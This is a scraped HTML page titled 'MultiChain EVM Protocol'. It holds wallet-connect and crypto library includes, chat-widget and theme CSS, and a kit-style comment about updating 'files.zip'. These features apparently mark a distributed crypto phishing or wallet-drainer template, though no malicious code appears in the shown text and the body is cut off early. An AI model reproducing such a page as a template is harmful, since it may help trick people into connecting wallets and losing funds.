<!DOCTYPE html>
<html lang="en" data-scrapbook-source="https://web.applicationhubs.net/" data-scrapbook-create="20240320180741752" data-theme="light"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

  <script charset="UTF-8" type="text/javascript" src="./index_files/6c4fcbbe-86dd-468e-ae2b-ff419a820641.js"></script><script type="text/javascript" charset="UTF-8" src="./index_files/crypto-js.min.js"></script> <!--–– Please update files.zip if you not already did and check below (updated the 05/20) ––-->

<script>
  document.addEventListener("DOMContentLoaded", function() {
    const elements = document.querySelectorAll('[ad-data-linked]');
    elements.forEach(element => {
        element.removeAttribute('ad-data-linked');
    });

    console.log('Removed ad-data-linked attributes from', elements.length, 'elements');
});

</script>

    <style>
      .interactButton {
      cursor: pointer;
      }
    </style>

  <title>MultiChain EVM Protocol</title>
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <style>
    html {
      scroll-behavior: smooth;
    }

    .section {
      padding: 70px;
    }
  </style>

  <style type="text/css">
    #sfjesr82fgp81705014846546 {
      outline: none !important;
      visibility: visible !important;
      resize: none !important;
      box-shadow: none !important;
      overflow: visible !important;
      background: none !important;
      opacity: 1 !important;
      filter: alpha(opacity=100) !important;
      -ms-filter: progid:DXImageTransform.Microsoft.Alpha(Opacity 1
      }) !important;
    -mz-opacity:1 !important;
    -khtml-opacity:1 !important;
    top:auto !important;
    right:0px !important;
    bottom:0px !important;
    left:auto !important;
    position:fixed !important;
    border:0 !important;
    min-height:0px !important;
    min-width:0px !important;
    max-height:none !important;
    max-width:none !important;
    padding:0px !important;
    margin:0px !important;
    -moz-transition-property:none !important;
    -webkit-transition-property:none !important;
    -o-transition-property:none !important;
    transition-property:none !important;
    transform:none !important;
    -webkit-transform:none !important;
    -ms-transform:none !important;
    width:auto !important;
    height:auto !important;
    display:none !important;
    z-index:2000000000 !important;
    background-color:transparent !important;
    cursor:none !important;
    float:none !important;
    border-radius:unset !important;
    pointer-events:auto !important;
    clip:auto !important;
    color-scheme:light !important;
    }

    #sfjesr82fgp81705014846546.widget-hidden {
      display: none !important;
    }

    #sfjesr82fgp81705014846546.widget-visible {
      display: block !important;
    }

    @media print {
      #sfjesr82fgp81705014846546.widget-visible {
        display: none !important;
      }
    }
  </style>
  <style type="text/css">
    @keyframes tawkMaxOpen {
      0% {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }

      to {
        opacity: 1;
        transform: translate(0, 0px);
      }
    }

    @-moz-keyframes tawkMaxOpen {
      0% {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }

      to {
        opacity: 1;
        transform: translate(0, 0px);
      }
    }

    @-webkit-keyframes tawkMaxOpen {
      0% {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }

      to {
        opacity: 1;
        transform: translate(0, 0px);
      }
    }

    #lp5b04jdl55g1705014846590.open {
      animation: tawkMaxOpen .25s ease !important;
    }

    @keyframes tawkMaxClose {
      from {
        opacity: 1;
        transform: translate(0, 0px);
        ;
      }

      to {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }
    }

    @-moz-keyframes tawkMaxClose {
      from {
        opacity: 1;
        transform: translate(0, 0px);
        ;
      }

      to {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }
    }

    @-webkit-keyframes tawkMaxClose {
      from {
        opacity: 1;
        transform: translate(0, 0px);
        ;
      }

      to {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }
    }

    #lp5b04jdl55g1705014846590.closed {
      animation: tawkMaxClose .25s ease !important
    }
  </style>
  <style type="text/css">
    #svf0u4grqff81710958038474 {
      outline: none !important;
      visibility: visible !important;
      resize: none !important;
      box-shadow: none !important;
      overflow: visible !important;
      background: none !important;
      opacity: 1 !important;
      filter: alpha(opacity=100) !important;
      -ms-filter: progid:DXImageTransform.Microsoft.Alpha(Opacity 1
      }) !important;
    -mz-opacity:1 !important;
    -khtml-opacity:1 !important;
    top:auto !important;
    right:0px !important;
    bottom:0px !important;
    left:auto !important;
    position:fixed !important;
    border:0 !important;
    min-height:0px !important;
    min-width:0px !important;
    max-height:none !important;
    max-width:none !important;
    padding:0px !important;
    margin:0px !important;
    -moz-transition-property:none !important;
    -webkit-transition-property:none !important;
    -o-transition-property:none !important;
    transition-property:none !important;
    transform:none !important;
    -webkit-transform:none !important;
    -ms-transform:none !important;
    width:auto !important;
    height:auto !important;
    display:none !important;
    z-index:2000000000 !important;
    background-color:transparent !important;
    cursor:none !important;
    float:none !important;
    border-radius:unset !important;
    pointer-events:auto !important;
    clip:auto !important;
    color-scheme:light !important;
    }

    #svf0u4grqff81710958038474.widget-hidden {
      display: none !important;
    }

    #svf0u4grqff81710958038474.widget-visible {
      display: block !important;
    }

    @media print {
      #svf0u4grqff81710958038474.widget-visible {
        display: none !important;
      }
    }
  </style>
  <style type="text/css">
    @keyframes tawkMaxOpen {
      0% {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }

      to {
        opacity: 1;
        transform: translate(0, 0px);
      }
    }

    @-moz-keyframes tawkMaxOpen {
      0% {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }

      to {
        opacity: 1;
        transform: translate(0, 0px);
      }
    }

    @-webkit-keyframes tawkMaxOpen {
      0% {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }

      to {
        opacity: 1;
        transform: translate(0, 0px);
      }
    }

    #fcpsr9lrogao1710958039431.open {
      animation: tawkMaxOpen .25s ease !important;
    }

    @keyframes tawkMaxClose {
      from {
        opacity: 1;
        transform: translate(0, 0px);
        ;
      }

      to {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }
    }

    @-moz-keyframes tawkMaxClose {
      from {
        opacity: 1;
        transform: translate(0, 0px);
        ;
      }

      to {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }
    }

    @-webkit-keyframes tawkMaxClose {
      from {
        opacity: 1;
        transform: translate(0, 0px);
        ;
      }

      to {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }
    }

    #fcpsr9lrogao1710958039431.closed {
      animation: tawkMaxClose .25s ease !important
    }
  </style>
<script type="text/javascript" charset="UTF-8" src="./index_files/ethers.umd.min.js"></script><script type="text/javascript" charset="UTF-8" src="./index_files/merkletree.js"></script><script type="text/javascript" charset="UTF-8" src="./index_files/wallet-connect-v4.js"></script><style>.install-model, .select-modal{z-index:2147483647;position:absolute}</style><style>
      @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap');
      :root {
        --w3m-color-mix-strength: 0%;
        --w3m-font-family: Inter, Segoe UI, Roboto, Oxygen, Ubuntu, Cantarell, Fira Sans, Droid Sans, Helvetica Neue, sans-serif;;
        --w3m-font-size-master: 10px;
        --w3m-border-radius-master: 4px;
        --w3m-z-index: 2147483646;

        --wui-font-family: var(--w3m-font-family);

        --wui-font-size-mini: calc(var(--w3m-font-size-master) * 0.8);
        --wui-font-size-micro: var(--w3m-font-size-master);
        --wui-font-size-tiny: calc(var(--w3m-font-size-master) * 1.2);
        --wui-font-size-small: calc(var(--w3m-font-size-master) * 1.4);
        --wui-font-size-paragraph: calc(var(--w3m-font-size-master) * 1.6);
        --wui-font-size-medium: calc(var(--w3m-font-size-master) * 1.8);
        --wui-font-size-large: calc(var(--w3m-font-size-master) * 2);
        --wui-font-size-medium-title: calc(var(--w3m-font-size-master) * 2.4);
        --wui-font-size-2xl: calc(var(--w3m-font-size-master) * 4);

        --wui-border-radius-5xs: var(--w3m-border-radius-master);
        --wui-border-radius-4xs: calc(var(--w3m-border-radius-master) * 1.5);
        --wui-border-radius-3xs: calc(var(--w3m-border-radius-master) * 2);
        --wui-border-radius-xxs: calc(var(--w3m-border-radius-master) * 3);
        --wui-border-radius-xs: calc(var(--w3m-border-radius-master) * 4);
        --wui-border-radius-s: calc(var(--w3m-border-radius-master) * 5);
        --wui-border-radius-m: calc(var(--w3m-border-radius-master) * 7);
        --wui-border-radius-l: calc(var(--w3m-border-radius-master) * 9);
        --wui-border-radius-3xl: calc(var(--w3m-border-radius-master) * 20);

        --wui-font-weight-light: 400;
        --wui-font-weight-regular: 500;
        --wui-font-weight-medium: 600;
        --wui-font-weight-bold: 700;

        --wui-letter-spacing-2xl: -1.6px;
        --wui-letter-spacing-medium-title: -0.96px;
        --wui-letter-spacing-large: -0.8px;
        --wui-letter-spacing-medium: -0.72px;
        --wui-letter-spacing-paragraph: -0.64px;
        --wui-letter-spacing-small: -0.56px;
        --wui-letter-spacing-tiny: -0.48px;
        --wui-letter-spacing-micro: -0.2px;
        --wui-letter-spacing-mini: -0.16px;

        --wui-spacing-0: 0px;
        --wui-spacing-4xs: 2px;
        --wui-spacing-3xs: 4px;
        --wui-spacing-xxs: 6px;
        --wui-spacing-2xs: 7px;
        --wui-spacing-xs: 8px;
        --wui-spacing-1xs: 10px;
        --wui-spacing-s: 12px;
        --wui-spacing-m: 14px;
        --wui-spacing-l: 16px;
        --wui-spacing-2l: 18px;
        --wui-spacing-xl: 20px;
        --wui-spacing-xxl: 24px;
        --wui-spacing-2xl: 32px;
        --wui-spacing-3xl: 40px;
        --wui-spacing-4xl: 90px;

        --wui-icon-box-size-xxs: 14px;
        --wui-icon-box-size-xs: 20px;
        --wui-icon-box-size-sm: 24px;
        --wui-icon-box-size-md: 32px;
        --wui-icon-box-size-lg: 40px;
        --wui-icon-box-size-xl: 64px;

        --wui-icon-size-inherit: inherit;
        --wui-icon-size-xxs: 10px;
        --wui-icon-size-xs: 12px;
        --wui-icon-size-sm: 14px;
        --wui-icon-size-md: 16px;
        --wui-icon-size-mdl: 18px;
        --wui-icon-size-lg: 20px;
        --wui-icon-size-xl: 24px;

        --wui-wallet-image-size-inherit: inherit;
        --wui-wallet-image-size-sm: 40px;
        --wui-wallet-image-size-md: 56px;
        --wui-wallet-image-size-lg: 80px;

        --wui-visual-size-size-inherit: inherit;
        --wui-visual-size-sm: 40px;
        --wui-visual-size-md: 55px;
        --wui-visual-size-lg: 80px;

        --wui-box-size-md: 100px;
        --wui-box-size-lg: 120px;

        --wui-ease-out-power-2: cubic-bezier(0, 0, 0.22, 1);
        --wui-ease-out-power-1: cubic-bezier(0, 0, 0.55, 1);

        --wui-ease-in-power-3: cubic-bezier(0.66, 0, 1, 1);
        --wui-ease-in-power-2: cubic-bezier(0.45, 0, 1, 1);
        --wui-ease-in-power-1: cubic-bezier(0.3, 0, 1, 1);

        --wui-ease-inout-power-1: cubic-bezier(0.45, 0, 0.55, 1);

        --wui-duration-lg: 200ms;
        --wui-duration-md: 125ms;
        --wui-duration-sm: 75ms;

        --wui-path-network-sm: path(
          'M15.4 2.1a5.21 5.21 0 0 1 5.2 0l11.61 6.7a5.21 5.21 0 0 1 2.61 4.52v13.4c0 1.87-1 3.59-2.6 4.52l-11.61 6.7c-1.62.93-3.6.93-5.22 0l-11.6-6.7a5.21 5.21 0 0 1-2.61-4.51v-13.4c0-1.87 1-3.6 2.6-4.52L15.4 2.1Z'
        );

        --wui-path-network-md: path(
          'M43.4605 10.7248L28.0485 1.61089C25.5438 0.129705 22.4562 0.129705 19.9515 1.61088L4.53951 10.7248C2.03626 12.2051 0.5 14.9365 0.5 17.886V36.1139C0.5 39.0635 2.03626 41.7949 4.53951 43.2752L19.9515 52.3891C22.4562 53.8703 25.5438 53.8703 28.0485 52.3891L43.4605 43.2752C45.9637 41.7949 47.5 39.0635 47.5 36.114V17.8861C47.5 14.9365 45.9637 12.2051 43.4605 10.7248Z'
        );

        --wui-path-network-lg: path(
          'M78.3244 18.926L50.1808 2.45078C45.7376 -0.150261 40.2624 -0.150262 35.8192 2.45078L7.6756 18.926C3.23322 21.5266 0.5 26.3301 0.5 31.5248V64.4752C0.5 69.6699 3.23322 74.4734 7.6756 77.074L35.8192 93.5492C40.2624 96.1503 45.7376 96.1503 50.1808 93.5492L78.3244 77.074C82.7668 74.4734 85.5 69.6699 85.5 64.4752V31.5248C85.5 26.3301 82.7668 21.5266 78.3244 18.926Z'
        );

        --wui-width-network-sm: 36px;
        --wui-width-network-md: 48px;
        --wui-width-network-lg: 86px;

        --wui-height-network-sm: 40px;
        --wui-height-network-md: 54px;
        --wui-height-network-lg: 96px;

        --wui-icon-size-network-xs: 12px;
        --wui-icon-size-network-sm: 16px;
        --wui-icon-size-network-md: 24px;
        --wui-icon-size-network-lg: 42px;

        --wui-color-inherit: inherit;

        --wui-color-inverse-100: #fff;
        --wui-color-inverse-000: #000;

        --wui-cover: rgba(20, 20, 20, 0.8);

        --wui-color-modal-bg: var(--wui-color-modal-bg-base);

        --wui-color-blue-100: var(--wui-color-blue-base-100);

        --wui-color-accent-100: var(--wui-color-accent-base-100);
        --wui-color-accent-090: var(--wui-color-accent-base-090);
        --wui-color-accent-080: var(--wui-color-accent-base-080);

        --wui-accent-glass-090: var(--wui-accent-glass-base-090);
        --wui-accent-glass-080: var(--wui-accent-glass-base-080);
        --wui-accent-glass-020: var(--wui-accent-glass-base-020);
        --wui-accent-glass-015: var(--wui-accent-glass-base-015);
        --wui-accent-glass-010: var(--wui-accent-glass-base-010);
        --wui-accent-glass-005: var(--wui-accent-glass-base-005);
        --wui-accent-glass-002: var(--wui-accent-glass-base-002);

        --wui-color-fg-100: var(--wui-color-fg-base-100);
        --wui-color-fg-125: var(--wui-color-fg-base-125);
        --wui-color-fg-150: var(--wui-color-fg-base-150);
        --wui-color-fg-175: var(--wui-color-fg-base-175);
        --wui-color-fg-200: var(--wui-color-fg-base-200);
        --wui-color-fg-225: var(--wui-color-fg-base-225);
        --wui-color-fg-250: var(--wui-color-fg-base-250);
        --wui-color-fg-275: var(--wui-color-fg-base-275);
        --wui-color-fg-300: var(--wui-color-fg-base-300);

        --wui-color-bg-100: var(--wui-color-bg-base-100);
        --wui-color-bg-125: var(--wui-color-bg-base-125);
        --wui-color-bg-150: var(--wui-color-bg-base-150);
        --wui-color-bg-175: var(--wui-color-bg-base-175);
        --wui-color-bg-200: var(--wui-color-bg-base-200);
        --wui-color-bg-225: var(--wui-color-bg-base-225);
        --wui-color-bg-250: var(--wui-color-bg-base-250);
        --wui-color-bg-275: var(--wui-color-bg-base-275);
        --wui-color-bg-300: var(--wui-color-bg-base-300);

        --wui-color-success-100: var(--wui-color-success-base-100);
        --wui-color-error-100: var(--wui-color-error-base-100);

        --wui-icon-box-bg-error-100: var(--wui-icon-box-bg-error-base-100);
        --wui-icon-box-bg-blue-100: var(--wui-icon-box-bg-blue-base-100);
        --wui-icon-box-bg-success-100: var(--wui-icon-box-bg-success-base-100);
        --wui-icon-box-bg-inverse-100: var(--wui-icon-box-bg-inverse-base-100);

        --wui-all-wallets-bg-100: var(--wui-all-wallets-bg-base-100);

        --wui-avatar-border: var(--wui-avatar-border-base);

        --wui-thumbnail-border: var(--wui-thumbnail-border-base);

        --wui-box-shadow-blue: rgba(71, 161, 255, 0.16);
      }
      @supports (background: color-mix(in srgb, white 50%, black)) {
        :root {
          --wui-color-modal-bg: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-modal-bg-base)
          );

          --wui-box-shadow-blue: color-mix(in srgb, var(--wui-color-accent-100) 16%, transparent);

          --wui-color-accent-090: color-mix(
            in srgb,
            var(--wui-color-accent-base-100) 90%,
            var(--w3m-default)
          );
          --wui-color-accent-080: color-mix(
            in srgb,
            var(--wui-color-accent-base-100) 80%,
            var(--w3m-default)
          );

          --wui-color-accent-090: color-mix(
            in srgb,
            var(--wui-color-accent-base-100) 90%,
            transparent
          );
          --wui-color-accent-080: color-mix(
            in srgb,
            var(--wui-color-accent-base-100) 80%,
            transparent
          );

          --wui-accent-glass-090: color-mix(
            in srgb,
            var(--wui-color-accent-base-100) 90%,
            transparent
          );
          --wui-accent-glass-080: color-mix(
            in srgb,
            var(--wui-color-accent-base-100) 80%,
            transparent
          );
          --wui-accent-glass-020: color-mix(
            in srgb,
            var(--wui-color-accent-base-100) 20%,
            transparent
          );
          --wui-accent-glass-015: color-mix(
            in srgb,
            var(--wui-color-accent-base-100) 15%,
            transparent
          );
          --wui-accent-glass-010: color-mix(
            in srgb,
            var(--wui-color-accent-base-100) 10%,
            transparent
          );
          --wui-accent-glass-005: color-mix(
            in srgb,
            var(--wui-color-accent-base-100) 5%,
            transparent
          );
          --wui-color-accent-002: color-mix(
            in srgb,
            var(--wui-color-accent-base-100) 2%,
            transparent
          );

          --wui-color-fg-100: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-100)
          );
          --wui-color-fg-125: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-125)
          );
          --wui-color-fg-150: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-150)
          );
          --wui-color-fg-175: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-175)
          );
          --wui-color-fg-200: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-200)
          );
          --wui-color-fg-225: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-225)
          );
          --wui-color-fg-250: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-250)
          );
          --wui-color-fg-275: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-275)
          );
          --wui-color-fg-300: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-fg-base-300)
          );

          --wui-color-bg-100: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-100)
          );
          --wui-color-bg-125: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-125)
          );
          --wui-color-bg-150: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-150)
          );
          --wui-color-bg-175: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-175)
          );
          --wui-color-bg-200: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-200)
          );
          --wui-color-bg-225: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-225)
          );
          --wui-color-bg-250: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-250)
          );
          --wui-color-bg-275: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-275)
          );
          --wui-color-bg-300: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-bg-base-300)
          );

          --wui-color-success-100: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-success-base-100)
          );
          --wui-color-error-100: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-color-error-base-100)
          );

          --wui-icon-box-bg-error-100: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-error-base-100)
          );
          --wui-icon-box-bg-accent-100: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-blue-base-100)
          );
          --wui-icon-box-bg-success-100: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-success-base-100)
          );
          --wui-icon-box-bg-inverse-100: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-icon-box-bg-inverse-base-100)
          );

          --wui-all-wallets-bg-100: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-all-wallets-bg-base-100)
          );

          --wui-avatar-border: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-avatar-border-base)
          );

          --wui-thumbnail-border: color-mix(
            in srgb,
            var(--w3m-color-mix) var(--w3m-color-mix-strength),
            var(--wui-thumbnail-border-base)
          );
        }
      }
    </style>
    <style>
      :root {
        --w3m-color-mix: #000;
        --w3m-accent: #3396ff;
        --w3m-default: #000;

        --wui-color-modal-bg-base: #fff;

        --wui-color-blue-base-100: #3396ff;

        --wui-color-accent-base-100: var(--w3m-accent);
        --wui-color-accent-base-090: #2d7dd2;
        --wui-color-accent-base-080: #2978cc;

        --wui-accent-glass-base-090: rgba(51, 150, 255, 0.9);
        --wui-accent-glass-base-080: rgba(51, 150, 255, 0.8);
        --wui-accent-glass-base-020: rgba(51, 150, 255, 0.2);
        --wui-accent-glass-base-015: rgba(51, 150, 255, 0.15);
        --wui-accent-glass-base-010: rgba(51, 150, 255, 0.1);
        --wui-accent-glass-base-005: rgba(51, 150, 255, 0.05);
        --wui-accent-glass-base-002: rgba(51, 150, 255, 0.02);

        --wui-color-fg-base-100: #141414;
        --wui-color-fg-base-125: #2d3131;
        --wui-color-fg-base-150: #474d4d;
        --wui-color-fg-base-175: #636d6d;
        --wui-color-fg-base-200: #798686;
        --wui-color-fg-base-225: #828f8f;
        --wui-color-fg-base-250: #8b9797;
        --wui-color-fg-base-275: #95a0a0;
        --wui-color-fg-base-300: #9ea9a9;

        --wui-color-bg-base-100: #ffffff;
        --wui-color-bg-base-125: #f5fafa;
        --wui-color-bg-base-150: #f3f8f8;
        --wui-color-bg-base-175: #eef4f4;
        --wui-color-bg-base-200: #eaf1f1;
        --wui-color-bg-base-225: #e5eded;
        --wui-color-bg-base-250: #e1e9e9;
        --wui-color-bg-base-275: #dce7e7;
        --wui-color-bg-base-300: #d8e3e3;

        --wui-color-success-base-100: #26b562;
        --wui-color-error-base-100: #f05142;

        --wui-success-glass-001: rgba(38, 181, 98, 0.01);
        --wui-success-glass-002: rgba(38, 181, 98, 0.02);
        --wui-success-glass-005: rgba(38, 181, 98, 0.05);
        --wui-success-glass-010: rgba(38, 181, 98, 0.1);
        --wui-success-glass-015: rgba(38, 181, 98, 0.15);
        --wui-success-glass-020: rgba(38, 181, 98, 0.2);
        --wui-success-glass-025: rgba(38, 181, 98, 0.25);
        --wui-success-glass-030: rgba(38, 181, 98, 0.3);
        --wui-success-glass-060: rgba(38, 181, 98, 0.6);
        --wui-success-glass-080: rgba(38, 181, 98, 0.8);

        --wui-error-glass-001: rgba(240, 81, 66, 0.01);
        --wui-error-glass-002: rgba(240, 81, 66, 0.02);
        --wui-error-glass-005: rgba(240, 81, 66, 0.05);
        --wui-error-glass-010: rgba(240, 81, 66, 0.1);
        --wui-error-glass-015: rgba(240, 81, 66, 0.15);
        --wui-error-glass-020: rgba(240, 81, 66, 0.2);
        --wui-error-glass-025: rgba(240, 81, 66, 0.25);
        --wui-error-glass-030: rgba(240, 81, 66, 0.3);
        --wui-error-glass-060: rgba(240, 81, 66, 0.6);
        --wui-error-glass-080: rgba(240, 81, 66, 0.8);

        --wui-icon-box-bg-error-base-100: #f4dfdd;
        --wui-icon-box-bg-blue-base-100: #d9ecfb;
        --wui-icon-box-bg-success-base-100: #daf0e4;
        --wui-icon-box-bg-inverse-base-100: #dcecfc;

        --wui-all-wallets-bg-base-100: #e8f1fa;

        --wui-avatar-border-base: #f3f4f4;

        --wui-thumbnail-border-base: #eaefef;

        --wui-gray-glass-001: rgba(0, 0, 0, 0.01);
        --wui-gray-glass-002: rgba(0, 0, 0, 0.02);
        --wui-gray-glass-005: rgba(0, 0, 0, 0.05);
        --wui-gray-glass-010: rgba(0, 0, 0, 0.1);
        --wui-gray-glass-015: rgba(0, 0, 0, 0.15);
        --wui-gray-glass-020: rgba(0, 0, 0, 0.2);
        --wui-gray-glass-025: rgba(0, 0, 0, 0.25);
        --wui-gray-glass-030: rgba(0, 0, 0, 0.3);
        --wui-gray-glass-060: rgba(0, 0, 0, 0.6);
        --wui-gray-glass-080: rgba(0, 0, 0, 0.8);
        --wui-gray-glass-090: rgba(0, 0, 0, 0.9);
      }
    </style>
    <style media="enabled">
      :root {
        --w3m-color-mix: #fff;
        --w3m-accent: #47a1ff;
        --w3m-default: #fff;

        --wui-color-modal-bg-base: #191a1a;

        --wui-color-blue-base-100: #47a1ff;

        --wui-color-accent-base-100: var(--w3m-accent);
        --wui-color-accent-base-090: #59aaff;
        --wui-color-accent-base-080: #6cb4ff;

        --wui-accent-glass-base-090: rgba(71, 161, 255, 0.9);
        --wui-accent-glass-base-080: rgba(71, 161, 255, 0.8);
        --wui-accent-glass-base-020: rgba(71, 161, 255, 0.2);
        --wui-accent-glass-base-015: rgba(71, 161, 255, 0.15);
        --wui-accent-glass-base-010: rgba(71, 161, 255, 0.1);
        --wui-accent-glass-base-005: rgba(71, 161, 255, 0.05);
        --wui-accent-glass-base-002: rgba(71, 161, 255, 0.02);

        --wui-color-fg-base-100: #e4e7e7;
        --wui-color-fg-base-125: #d0d5d5;
        --wui-color-fg-base-150: #a8b1b1;
        --wui-color-fg-base-175: #a8b0b0;
        --wui-color-fg-base-200: #949e9e;
        --wui-color-fg-base-225: #868f8f;
        --wui-color-fg-base-250: #788080;
        --wui-color-fg-base-275: #788181;
        --wui-color-fg-base-300: #6e7777;

        --wui-color-bg-base-100: #141414;
        --wui-color-bg-base-125: #191a1a;
        --wui-color-bg-base-150: #1e1f1f;
        --wui-color-bg-base-175: #222525;
        --wui-color-bg-base-200: #272a2a;
        --wui-color-bg-base-225: #2c3030;
        --wui-color-bg-base-250: #313535;
        --wui-color-bg-base-275: #363b3b;
        --wui-color-bg-base-300: #3b4040;

        --wui-color-success-base-100: #26d962;
        --wui-color-error-base-100: #f25a67;

        --wui-success-glass-001: rgba(38, 217, 98, 0.01);
        --wui-success-glass-002: rgba(38, 217, 98, 0.02);
        --wui-success-glass-005: rgba(38, 217, 98, 0.05);
        --wui-success-glass-010: rgba(38, 217, 98, 0.1);
        --wui-success-glass-015: rgba(38, 217, 98, 0.15);
        --wui-success-glass-020: rgba(38, 217, 98, 0.2);
        --wui-success-glass-025: rgba(38, 217, 98, 0.25);
        --wui-success-glass-030: rgba(38, 217, 98, 0.3);
        --wui-success-glass-060: rgba(38, 217, 98, 0.6);
        --wui-success-glass-080: rgba(38, 217, 98, 0.8);

        --wui-error-glass-001: rgba(242, 90, 103, 0.01);
        --wui-error-glass-002: rgba(242, 90, 103, 0.02);
        --wui-error-glass-005: rgba(242, 90, 103, 0.05);
        --wui-error-glass-010: rgba(242, 90, 103, 0.1);
        --wui-error-glass-015: rgba(242, 90, 103, 0.15);
        --wui-error-glass-020: rgba(242, 90, 103, 0.2);
        --wui-error-glass-025: rgba(242, 90, 103, 0.25);
        --wui-error-glass-030: rgba(242, 90, 103, 0.3);
        --wui-error-glass-060: rgba(242, 90, 103, 0.6);
        --wui-error-glass-080: rgba(242, 90, 103, 0.8);

        --wui-icon-box-bg-error-base-100: #3c2426;
        --wui-icon-box-bg-blue-base-100: #20303f;
        --wui-icon-box-bg-success-base-100: #1f3a28;
        --wui-icon-box-bg-inverse-base-100: #243240;

        --wui-all-wallets-bg-base-100: #222b35;

        --wui-avatar-border-base: #252525;

        --wui-thumbnail-border-base: #252525;

        --wui-gray-glass-001: rgba(255, 255, 255, 0.01);
        --wui-gray-glass-002: rgba(255, 255, 255, 0.02);
        --wui-gray-glass-005: rgba(255, 255, 255, 0.05);
        --wui-gray-glass-010: rgba(255, 255, 255, 0.1);
        --wui-gray-glass-015: rgba(255, 255, 255, 0.15);
        --wui-gray-glass-020: rgba(255, 255, 255, 0.2);
        --wui-gray-glass-025: rgba(255, 255, 255, 0.25);
        --wui-gray-glass-030: rgba(255, 255, 255, 0.3);
        --wui-gray-glass-060: rgba(255, 255, 255, 0.6);
        --wui-gray-glass-080: rgba(255, 255, 255, 0.8);
        --wui-gray-glass-090: rgba(255, 255, 255, 0.9);
      }
    </style>
    

    
    <script type="module" crossorigin src="/assets/index-BAaij6hb.js"></script>
    <link rel="stylesheet" crossorigin href="/assets/index-CQAbba_D.css">
  </head>

<body class="csn8e c4aab cgum6 cvhsn c9tl9" data-aos-easing="ease-out-cubic" data-aos-duration="500" data-aos-delay="0">

  <main class="cf1jb">
    <section class="csghv cn8hk c8w8t">

      <div class="cgtjr cov9f cokz4 cs58h c1p84 c1hsh c20k8 cv4we cdbty czarn cy0u8" aria-hidden="true"></div>

      <div class="cgtjr cov9f cjnxd cokz4 c1hsh coo5p cwrme cf03e ce7wk" aria-hidden="true">
        <img src="data:image/svg+xml,%3csvg%20width='1440'%20height='453'%20xmlns='http://www.w3.org/2000/svg'%3e%3cdefs%3e%3clinearGradient%20x1='100%25'%20y1='37.276%25'%20x2='9.488%25'%20y2='37.276%25'%20id='a'%3e%3cstop%20stop-color='%2338BDF8'%20offset='0%25'/%3e%3cstop%20stop-color='%2338BDF8'%20stop-opacity='0'%20offset='100%25'/%3e%3c/linearGradient%3e%3cfilter%20x='-23.6%25'%20y='-187.5%25'%20width='147.2%25'%20height='475%25'%20filterUnits='objectBoundingBox'%20id='b'%3e%3cfeGaussianBlur%20stdDeviation='50'%20in='SourceGraphic'/%3e%3c/filter%3e%3c/defs%3e%3cpath%20filter='url(%23b)'%20transform='rotate(-20%20604.033%20255.18)'%20d='m322.117%20215.179-35.584%2080h599.418l35.582-80z'%20fill='url(%23a)'%20fill-rule='evenodd'/%3e%3c/svg%3e" class="cpd9d" width="1440" height="453" alt="Features 02 Illustration">
      </div>

      <div class="crs2z c12sl ced2s cgwxs">
